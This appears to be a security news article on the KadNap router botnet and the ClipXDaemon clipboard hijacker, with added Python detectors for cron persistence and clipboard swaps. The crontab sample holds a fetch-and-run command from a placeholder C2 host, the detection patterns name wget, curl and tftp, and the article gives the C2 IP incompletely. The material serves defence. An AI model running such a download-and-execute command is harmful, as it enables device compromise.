
Cybersecurity researchers have discovered a new malware called KadNap that primarily targets Asus routers and forces them to join a botnet that proxies malicious traffic.
According to Lumen’s Black Lotus Labs team, the malware was first detected in August 2025 and has spread to more than 14,000 infected devices, with more than 60% of victims concentrated in the United States. Fewer infections have been detected in Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy and Spain.
“KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to hide the IP addresses of its infrastructure within peer-to-peer systems and evade traditional network monitoring,” the cybersecurity firm said in a report shared with The Hacker News.
Compromised nodes in the network leverage the DHT protocol to locate and connect to command and control (C2) servers, making them more resistant to detection and disruption.
Once a device is compromised, it is sold through a proxy service named Doppelgänger, which is believed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger’s website claims to offer residential proxies with “100% anonymity” in over 50 countries. The service is said to have launched in May or June 2025.
Despite its focus on Asus routers, KadNap operators have been found deploying malware against a variety of edge networking devices.
At the heart of the attack is a shell script (‘aic.sh’) downloaded from a C2 server (‘212.104.141’). This file starts the process of recruiting the victim into the P2P network: it creates a cron job that retrieves a shell script from the server at minute 55 of every hour, renames it “.asusrouter” and runs it.
Once persistence is established, the script retrieves a malicious ELF file, renames it “kad” and executes it, which deploys KadNap. The malware can run on devices with both ARM and MIPS processors.
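A defender-side check for the persistence step described above, written for this article rather than taken from Lumen’s report: it scans crontab text for an hourly job at minute 55 whose command names one of the reported loader artifacts or pulls content from the network. The sample crontab, the use of wget, and C2_PLACEHOLDER are constructed assumptions.

```python
import re
from typing import List

# Constructed sample crontab text, not from the report: one benign job and one
# job shaped like the persistence step described above (minute 55 of every hour,
# fetch a script, save it as ".asusrouter", run it). C2_PLACEHOLDER stands in
# for the C2 host, which is not reproduced here; wget is assumed.
SAMPLE_CRONTAB = """\
0 3 * * * /sbin/logrotate
55 * * * * wget -q -O /tmp/.asusrouter http://C2_PLACEHOLDER/aic.sh && sh /tmp/.asusrouter
"""

# Names the article ties to the loader chain: the dropped script, the initial
# shell script, and the renamed ELF payload "kad" (matched as a whole path element).
KADNAP_MARKERS = re.compile(r"\.asusrouter|aic\.sh|(?:^|[/\s])kad(?:\s|$)")
# Any command that pulls content from the network is a second, weaker signal.
NETWORK_FETCH = re.compile(r"\b(wget|curl|tftp)\b")

def suspicious_cron_lines(crontab: str) -> List[dict]:
    """Return entries that look like the KadNap persistence job.

    An entry is reported when it runs at minute 55 of every hour and its command
    either names a known loader artifact or fetches something from the network.
    """
    hits = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # minute hour dom month dow command
        if len(fields) < 6:
            continue
        minute, hour, command = fields[0], fields[1], fields[5]
        if minute != "55" or hour != "*":
            continue
        reasons = []
        if KADNAP_MARKERS.search(command):
            reasons.append("known KadNap artifact name")
        if NETWORK_FETCH.search(command):
            reasons.append("hourly network fetch")
        if reasons:
            hits.append({"entry": line, "reasons": reasons})
    return hits
```

On a router, feed it the output of `crontab -l` or the contents of /var/spool/cron/crontabs; any hit warrants pulling the referenced file for inspection.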
KadNap is designed to connect to a Network Time Protocol (NTP) server to obtain the current time and store it along with host uptime. This information serves as the basis for creating hashes that are used to find other peers in the distributed network to receive commands or download additional files.
The files – fwr.sh and /tmp/.sose – contain functionality that closes port 22 (the standard TCP port for Secure Shell, SSH) on infected devices and extracts a list of C2 IP address and port combinations to connect to.
“In short, the innovative use of the DHT protocol allows malware to hide behind the noise of legitimate peer-to-peer traffic and establish a robust communication channel that is difficult to disrupt,” Lumen said.
Further analysis reveals that not all compromised devices communicate with all C2 servers, indicating that the infrastructure is partitioned by device type and model.
The Black Lotus Labs team told The Hacker News that the Doppelgänger bot is being used by threat actors in the wild. “One problem is that these Asus (and other devices) can also be infected with other malware at the same time, making it difficult to say exactly who is responsible for specific malicious activity,” the company said.
We recommend that users running SOHO routers keep their devices up to date, reboot regularly, change default passwords, secure management interfaces, and replace end-of-life models.
“The KadNap botnet stands out among botnets that support anonymous proxies in its use of peer-to-peer networks for decentralized control,” Lumen concluded. “Its intent is clear: to avoid detection and make it difficult for defenders to defend against.”
New Linux threat ClipXDaemon emerges
The disclosure comes as Cyble details a new Linux threat called ClipXDaemon, designed to target cryptocurrency users by intercepting and altering copied wallet addresses. The clipper malware is distributed via a Linux post-exploitation framework called ShadowHS and is described as an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments.
The malware is staged entirely in memory and employs stealth techniques such as process masquerading and Wayland session avoidance, while monitoring the clipboard every 200 milliseconds and replacing cryptocurrency addresses with attacker-controlled wallets. It can target Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets.
The decision not to run in a Wayland session is deliberate: the display server protocol’s security architecture puts additional controls in place, such as requiring explicit user interaction before an application can access clipboard content. By disabling itself in such scenarios, the malware aims to reduce noise and avoid runtime errors.
“ClipXDaemon is fundamentally different from traditional Linux malware. ClipXDaemon contains no command-and-control (C2) logic, executes no beacons, and does not require remote tasks,” the company said. “Instead, it monetizes victims directly by hijacking copied cryptocurrency wallet addresses in X11 sessions and replacing them with attacker-controlled addresses in real time.”
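A detection heuristic for the clipboard-swap behaviour described above, added here as illustration and not drawn from Cyble’s analysis: because the clipper polls every 200 ms and overwrites an address with another of the same wallet type, a monitor that samples the clipboard can flag a wallet address that changes into a different address of the same coin within a short window. The address patterns are format checks only, the window of 1000 ms is an assumption, and the clipboard samples are constructed.

```python
import re
from typing import List, Optional, Tuple

# Format checks (prefix, charset, length) for the wallet types the report
# lists; they do not verify checksums.
ADDRESS_PATTERNS = [
    ("bitcoin",  re.compile(r"^(bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$")),
    ("ethereum", re.compile(r"^0x[0-9a-fA-F]{40}$")),
    ("litecoin", re.compile(r"^(ltc1[a-z0-9]{25,62}|[LM][a-km-zA-HJ-NP-Z1-9]{26,33})$")),
    ("monero",   re.compile(r"^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$")),
    ("tron",     re.compile(r"^T[1-9A-HJ-NP-Za-km-z]{33}$")),
    ("dogecoin", re.compile(r"^D[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}$")),
    ("ripple",   re.compile(r"^r[1-9A-HJ-NP-Za-km-z]{24,34}$")),
    ("ton",      re.compile(r"^(EQ|UQ|kQ|0Q)[A-Za-z0-9_-]{46}$")),
]

def classify_address(text: str) -> Optional[str]:
    """Return the wallet type a clipboard string looks like, or None."""
    text = text.strip()
    for coin, pattern in ADDRESS_PATTERNS:
        if pattern.match(text):
            return coin
    return None

# Alert tuple: (time_ms, coin, original_address, replacement_address)
Swap = Tuple[int, str, str, str]

def detect_clipboard_swaps(samples: List[Tuple[int, str]], window_ms: int = 1000) -> List[Swap]:
    """Flag a wallet address that turns into a different address of the same type
    within window_ms: users rarely do that, a 200 ms clipper does exactly that."""
    alerts: List[Swap] = []
    prev_t, prev_text = 0, ""
    for t_ms, text in samples:
        if text != prev_text:
            coin = classify_address(text)
            if coin is not None and coin == classify_address(prev_text) and t_ms - prev_t <= window_ms:
                alerts.append((t_ms, coin, prev_text.strip(), text.strip()))
        prev_t, prev_text = t_ms, text
    return alerts

# Constructed clipboard samples (ms, content), not captured data: the Ethereum
# address is replaced 200 ms after being copied (a swap); the Bitcoin address
# changes 3 s later, which is treated as an ordinary user copy.
USER_ETH = "0x" + "1234567890abcdef" * 2 + "12345678"
ATTACKER_ETH = "0x" + "deadbeef" * 5
SAMPLE_CLIPBOARD = [
    (1000, USER_ETH), (1200, ATTACKER_ETH),
    (5000, "bc1q" + "x" * 38), (8000, "bc1q" + "z" * 38),
]
```

In a live monitor the samples would come from polling the X11 clipboard (for example via xclip) at an interval shorter than the clipper’s 200 ms, so that the original address is observed before it is overwritten.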
